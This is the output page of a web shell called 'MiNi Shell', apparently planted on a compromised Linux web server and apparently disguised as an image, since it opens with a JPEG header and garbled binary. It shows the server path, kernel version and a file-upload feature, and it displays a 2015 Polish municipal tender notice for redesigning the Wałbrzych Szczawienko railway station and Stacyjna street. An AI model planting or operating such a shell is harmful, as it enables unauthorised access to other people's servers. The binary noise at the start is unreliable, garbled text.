JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150708/170056-N-2015.html

<p class="kh_header"><b>Wałbrzych: Wykonanie prac projektowo - kosztorysowych dla zadania inwestycyjnego polegającego na: kompleksowym remoncie i przebudowie budynku dworca kolejowego Wałbrzych Szczawienko wraz z niezbędną infrastrukturą techniczną i kolejową oraz kompleksowym remoncie i przebudowie drogi - ulicy Stacyjnej wraz z wykonaniem parkingów w celu wdrożenia systemu Parkuj i Jedź (Park&Ride) na terenie dz. nr ewid.  65/7, 65/8 oraz 65/9 obr. 3 Szczawienko, zlokalizowanych w Wałbrzychu.</b><br>
<b>Numer ogłoszenia: 170056 - 2015; data zamieszczenia: 08.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych , Pl. Magistracki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6655153, 6655154, faks 074 6655155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac projektowo - kosztorysowych dla zadania inwestycyjnego polegającego na: kompleksowym remoncie i przebudowie budynku dworca kolejowego Wałbrzych Szczawienko wraz z niezbędną infrastrukturą techniczną i kolejową oraz kompleksowym remoncie i przebudowie drogi - ulicy Stacyjnej wraz z wykonaniem parkingów w celu wdrożenia systemu Parkuj i Jedź (Park&Ride) na terenie dz. nr ewid.  65/7, 65/8 oraz 65/9 obr. 3 Szczawienko, zlokalizowanych w Wałbrzychu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac projektowo - kosztorysowych dla zadania inwestycyjnego polegającego na: kompleksowym remoncie i przebudowie budynku dworca kolejowego Wałbrzych Szczawienko wraz z niezbędną infrastrukturą techniczną i kolejową oraz kompleksowym remoncie i przebudowie drogi - ulicy Stacyjnej wraz z wykonaniem parkingów w celu wdrożenia systemu Parkuj i Jedź (Park&Ride) na terenie dz. nr ewid. 65/7, 65/8 oraz 65/9 obr.3 Szczawienko, zlokalizowanych w Wałbrzychu.
Przedmiot zamówienia został podzielony na cztery etapy. 
Etap I obejmuje wykonanie:
a) projektów budowlanych wielobranżowych - 6 egz.,
b) przygotowanie wniosków wraz z niezbędnymi załącznikami o uzyskanie decyzji o pozwoleniu na budowę - 2 egz.,
Etap II obejmuje uzyskanie decyzji o pozwoleniu na budowę,
Etap III obejmuje wykonanie:
a) projektów wykonawczych dla wszystkich koniecznych branż - po 3 egz.,
b) kosztorysów inwestorskich - 2 egz.,
c) przedmiarów robót - 3 egz.,
d) zbiorczego zestawienia kosztów - 2 egz.,
e) specyfikacji technicznych wykonania i odbioru robót budowlanych - 3 egz.,
f) forma elektroniczna, płyta CD - 1 szt.,
Etap IV - prowadzenie nadzoru autorskiego w ramach zadania będącego przedmiotem niniejszej Umowy.
W ramach działania przewiduje się między innymi:
-kompleksowy remont budynku dworca z dopuszczeniem przebudowy,
-kompleksowy remont ulicy Stacyjnej z dopuszczeniem przebudowy,
-wykonanie parkingów przy ul. Stacyjnej,
-wykonanie ścieżek pieszych i rowerowych,
-wykonanie pętli autobusowej wraz z wiatą przystankową,
-wykonanie oświetlenia terenu,
-wykonanie nowych nasadzeń i wycinkę drzew kolidujących z inwestycją,
-remont nawierzchni działek,
-zagospodarowanie terenu i wyposażenie w elementy małej architektury,
-rozbiórkę przybudówki budynku dworca.
Zamówienie będzie realizowane w ramach projektu pn.Rozwój Obszaru Funkcjonalnego Aglomeracji Wałbrzyskiej poprzez opracowanie dokumentów strategicznych wspierających integrację 22 JST: Strategii ZIT, Programu Gospodarki Niskoemisyjnej i Zintegrowanego Programu Transportu Publicznego dofinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013.
Dla całości prac projektowych obowiązkiem Wykonawcy jest:
1.Opracować projekty wykonawcze należy oddzielnie dla każdej branży.
2.Stosować rozwiązania przyjazne środowisku w tym panele solarne, ogniwa fotowoltaiczne, pompy ciepła. 
3.Uzyskać we własnym zakresie i na własny koszt niezbędnych (jeżeli będą wymagane na podstawie przepisów szczególnych i jeżeli będą konieczne do opracowania przedmiotu zamówienia) opracowań danych wyjściowych takich jak np.: decyzje o warunkach zabudowy i zagospodarowania terenu, decyzje o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, zezwolenia na usunięcie drzew i krzewów, mapy do celów projektowych, badania geotechniczne, odstępstwa od przepisów techniczno-budowlanych, decyzje konserwatorskie, decyzje na lokalizację zjazdów z dróg publicznych, inwentaryzacje budowlane i urbanistyczne, operaty ochrony środowiska, operaty geologiczne, operaty górnicze, inwentaryzacje zieleni, badania gruntowe, wypisy z rejestru gruntów, mapy ewidencji gruntów, warunki przyłączenia mediów, promesy gestorów sieci, a także inne niezbędne do prawidłowego wykonania przedmiotu Umowy. 
4. Uzyskać uzgodnienia, materiały i decyzje niezbędne do prawidłowego wykonania przedmiotu zamówienia we własnym zakresie, za wyjątkiem wskazanych w obowiązkach Zamawiającego.
5. Uzyskać we własnym zakresie i na własny koszt, w imieniu Zamawiającego, warunki przyłączeniowe niezbędnych mediów i na tej podstawie zaprojektować przyłącza mediów.
6. Współpracować z Zamawiającym na etapie uzyskiwania zgody właścicieli działek, które będzie obejmować inwestycja i ewentualnie, jeżeli będą konieczne do zrealizowania zadania, także działek sąsiednich, polegająca na przygotowaniu odpowiednich wniosków zawierających niezbędne dane na temat planowanej inwestycji. 
7. Wszystkie dokumenty wymienione Wykonawca dostarczyć w formie drukowanej we wskazanych ilościach, a także w formie elektronicznej na płycie CD (w formacie pdf i dwg część kosztowa, tj. przedmiary robót i kosztorysy w plikach pdf, ath i xls). Niedopuszczalne są rozbieżności pomiędzy zapisem elektronicznym, a formą pisemną, a w przypadku zaistnienia takich niezgodności w trakcie trwania prac budowlano- montażowych, kosztami z tego tytułu Zamawiający obciąży Wykonawcę.
8. Wykonanie prac projektowych zgodnie z obowiązującymi przepisami prawa.
9. Opracowanie projektów budowlanych i wykonawczych przez osoby posiadające odpowiednie uprawnienia budowlane do projektowania zgodnie z Prawem Budowlanym.
10. Wykonanie prac projektowych zgodnie z:
a) Ustawą Prawo Budowlane,
b) Ustawą z dnia 28 marca 2003 r. o transporcie kolejowym (Dz. U. Nr 86 poz . 789 z późn. zm.),
c) Rozporządzeniem Ministra Infrastruktury z dnia 7 sierpnia 2008 r. w sprawie wymagań w zakresie odległości i warunków dopuszczających usytuowanie drzew i krzewów, elementów ochrony akustycznej i wykonywania robót ziemnych w sąsiedztwie linii kolejowej, a także sposobu urządzania    i utrzymania zasłon odśnieżnych oraz pasów przeciwpożarowych (Dz. U. z 2014 r. poz. 1227) 
d) Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75 poz. 690 z późniejszymi zmianami), 
e) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, (Dz. U. z 2013 r. poz. 1129) , zgodnie z którym przedmiary robót i kosztorysy mają nawiązywać do specyfikacji technicznych wykonania i odbioru robót budowlanych, natomiast projekt architektoniczno - budowlany oraz projekt zagospodarowania powinny zostać wykonane z wyraźnie zaznaczonymi granicami nieruchomości, na której budowany jest budynek będący przedmiotem przedsięwzięcia, przyłączami technicznymi oraz obiektami i urządzeniami związanymi z budynkiem.
11. Terminowe wykonanie prac objętych Umową.
12. Pełnienie nadzoru autorskiego.
13. Uzgadnianie rozwiązań projektowych z konserwatorem zabytków oraz zarządcami infrastruktury kolejowej.
14. Kosztorysy inwestorskie należy wykonać oddzielnie dla budynku i dla drogi..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy  Wykonawca w  wypadku  złożenia  oferty  na  zadanie  zobowiązany  jest  do  wniesienia  wadium przetargowego w wysokości: 5 000,00 zł najpóźniej do  16.07.2015 r. do godz. 10.00. Wadium   należy   wnieść   na  konto  Urzędu  Miejskiego:  Bank  Handlowy  w Warszawie  S.A.  Nr rach: 92 1030 1289 0000 0000  9000  0152  przelewem  z  zaznaczeniem:  wadium  przetargowe:  Wykonanie prac projektowo - kosztorysowych Wałbrzych- Szczawienko.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować posiadanie odpowiedniego doświadczenia polegającego na wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w  tym okresie:
a) co najmniej jednej dokumentacji projektowo - kosztorysowej dla zadania obejmującego wykonanie i odbiór robót budowlano - montażowych remontu lub budowy drogi klasy dojazdowej,                       
b) co najmniej jednej dokumentacji projektowo - kosztorysowej dla zadania obejmującego wykonanie i odbiór robót budowlano - montażowych budowy parkingu na co najmniej 30 miejsc postojowych,
c) co najmniej jednej dokumentacji projektowo - kosztorysowej dla remontu/modernizacji lub budowy obiektów zlokalizowanych w strefie zabytkowej o kubaturze min. 10 000 m3 lub remontu/modernizacji obiektu zabytkowego wpisanego do rejestru zabytków o kubaturze min. 10 000 m3.
Zamawiający dopuszcza możliwość łączenia poszczególnych usług.
Przez jedną usługę Zamawiający rozumie usługę wykonaną na podstawie jednej umowy lub jednego zadania inwestycyjnego.
W celu udokumentowania wymaganego doświadczenia Wykonawca powinien przedstawić wykaz wykonanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania oraz dokument potwierdzający że dana usługa została należycie wykonana.
Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien przedstawić wykaz osób, którymi dysponuje lub będzie dysponować, i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonanych przez nie czynności i/lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa wcześniej, Wykonawca wykazał osoby, którymi będzie dysponował. Ponadto dla w/w osób Wykonawca zobowiązany jest przedłożyć oświadczenia, że dana osoba posiada wymagane uprawnienia zawodowe - Załącznik nr 3.
Wymagane osoby: 
a) projektant branży architektonicznej, posiadający aktualne uprawnienia  do  projektowania  w   specjalności
architektonicznej, 
b) osoba   sprawdzająca  branży  architektonicznej,  posiadająca  aktualne  uprawnienia do  projektowania  w
specjalności architektonicznej,
c) projektant branży  konstrukcyjno - budowlanej,  posiadający  aktualne  uprawnienia  do  projektowania  w
specjalności konstrukcyjno - budowlanej,
d) osoba  sprawdzająca   branży   konstrukcyjno  -  budowlanej,  posiadająca   aktualne  uprawnienia   do
projektowania w specjalności konstrukcyjno - budowlanej,
e) projektant  branży  sanitarnej,  posiadający  aktualne  uprawnienia   do   projektowania  w   specjalności
instalacyjnej   w   zakresie     sieci,      instalacji    i     urządzeń    cieplnych,     wentylacyjnych,     gazowych,
wodociągowych  i kanalizacyjnych,
f) osoba    sprawdzająca    branży    sanitarnej,   posiadająca   aktualne  uprawnienia   do  projektowania  w
specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,
wodociągowych  i kanalizacyjnych.
g) projektant branży elektrycznej, posiadający aktualne uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
h) osoba sprawdzająca branży elektrycznej, posiadająca aktualne uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Zamawiający dopuszcza łączenie funkcji w ramach osób projektujących i w ramach osób sprawdzających. Innego łączenia funkcji nie dopuszcza się.
Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres obowiązywania gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza ewentualną zmianę następujących postanowień umownych, na podstawie określonych poniżej warunków: 
1) Zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT, 
2) Osób będących przedstawicielami Zamawiającego z przyczyn niezależnych od niego, 
3) Osób spełniających warunki udziału w przedmiotowym postępowaniu wymienionych w ofercie, pod warunkiem wyrażenia zgody przez Zamawiającego oraz że zaproponowane osoby będą spełniały warunki udziału opisane w SIWZ,
4) Zamawiający dopuszcza ewentualną zmianę postanowień umownych gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z niniejszą Specyfikacją - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia,
5) Dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy Inicjatorem tej zmiany może być zamawiający lub wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.walbrzych.pl/zzp/szczawienko.zip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> rząd Miejski w Wałbrzychu, Pl. Magistracki 1, 58-300 Wałbrzych, pok. nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2015 godzina 10:00, miejsce: Urząd Miejski w Wałbrzychu, Pl. Magistracki 1, 58-300 Wałbrzych, pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie Rozwój Obszaru Funkcjonalnego Aglomeracji Wałbrzyskiej poprzez opracowanie dokumentów strategicznych wspierających integrację 22 JST: Strategii ZIT, Programu Gospodarki Niskoemisyjnej i Zintegrowanego Programu Transportu Publicznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com